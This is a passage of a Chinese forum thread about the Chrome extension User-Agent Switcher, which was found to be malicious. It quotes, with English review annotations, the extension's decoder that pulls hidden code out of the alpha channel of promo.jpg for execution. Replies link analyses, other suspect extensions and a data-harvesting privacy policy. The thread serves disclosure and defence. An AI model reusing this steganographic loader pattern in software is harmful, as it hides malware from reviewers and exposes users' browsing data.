https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
background.js 的第 80 行会从 promo.jpg 这张图片里解密出恶意代码并执行:
/**
 * Image-steganography decoder quoted from the extension's background.js.
 *
 * Draws an image onto a hidden canvas, reads one value per pixel out of the
 * alpha channel, and packs those values into a string that it returns. The
 * function only decodes; according to the thread, the caller then executes
 * the returned string (that call is not part of this excerpt).
 *
 * Review relevance: the decoded text lives in an image asset, not in any
 * script file, so a review limited to the extension's .js files would not
 * see it. A canvas getImageData() read of a bundled image followed by
 * String.fromCharCode assembly is the pattern to look for.
 *
 * @param {*} t - Image source. Defaults to '../promo.jpg' when undefined; a
 *   value with a truthy `length` (e.g. a path string) is passed through r.Wk
 *   first (r.Wk is not shown here; presumably it resolves to an image element).
 * @param {Object} [e] - Optional overrides for the defaults in this.ET
 *   (mp, Tv, At, TY, plus width/height for the canvas).
 * @returns {string} The decoded text, or "" when the canvas is empty, all
 *   pixel data is zero, the mode is not 1, or fewer than 13 characters decode.
 */
t.prototype.Vh = function(t, e) {
// Compares two constants, so this guard can never fire (likely left over from
// a build step that substitutes the image path).
if ("" === '../promo.jpg') return "";
// Default the source to the bundled image, resolve it through r.Wk when it
// looks like a string, and default the options object.
void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
// i: used below as the number of bits each extracted value contributes.
i = e.mp || n.mp,
// o: mode selector; only the value 1 is handled in this function.
o = e.Tv || n.Tv,
// h: used below as the bit width of each output character.
h = e.At || n.At,
// a: offset term derived from 2^i via r.Yb (r.Yb is not shown here).
a = r.Yb(Math.pow(2, i)),
// f: end-of-message predicate. The comma operator discards the WC lookup,
// so only TY is actually kept.
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
// Hidden canvas sized from the options or the image; bail out on an empty one.
// NOTE(review): height falls back through e.width, not e.height, as written.
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
// ImageData.data is a flat RGBA byte array, four bytes per pixel.
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
// Nothing was drawn (every byte is zero): nothing to decode.
if (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
if (1 === o)
// Start at index 3 and step by 4: this visits only the alpha byte of each
// pixel. Stop once f reports the terminator; otherwise store the alpha value
// minus the offset (255 - a + 1). The `!s` test appears twice and is redundant.
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
// v: output string, w: bit accumulator, y: bits currently held in w,
// l: mask for the low h bits.
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
// Append each i-bit value to the accumulator; once h bits are available, emit
// one character and carry the unused high bits of the current value forward.
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
// Fewer than 13 decoded characters is treated as "no payload"; otherwise
// flush any non-zero remainder as a final character.
return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619
101
chanssl 2017-09-10 20:09:20 +08:00
日狗了,竟然是恶意程序,中奖了
102
Bailang 2017-09-10 21:15:38 +08:00
103
chroming 2017-09-10 22:54:44 +08:00
突然发现去年就有人发现这个扩展有问题了: https://www.v2ex.com/t/263719
104
Bailang 2017-09-11 09:52:04 +08:00
转载 侵删
https://x.threatbook.cn/article?threatInfoID=113 有人贴出了这个 policy:
"Collected Information. Accessing and Using the Services. When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users."
105
nyanyh 2017-09-11 11:52:12 +08:00
@acess omg...我还用着 Better History,有时候 Surge 里看到随机的 dwoqpurpfdjksla.lan 这种奇怪的域名不知道是不是这个扩展搞的
107
cyg07 2017-09-20 19:10:53 +08:00
@redsonic @anoymoux @xssnull
360CERT 的具体分析:"Chrome 插件 User – Agent Switcher 恶意代码分析报告" http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw
108
ariza 2017-09-22 10:23:32 +08:00
为毛依然屹立不倒。。
110
lyragosa 2017-10-18 23:32:49 +08:00
我似乎就是这个插件……吓得我赶紧删掉了
112
legege007 2020-09-05 20:48:27 +08:00
已下架了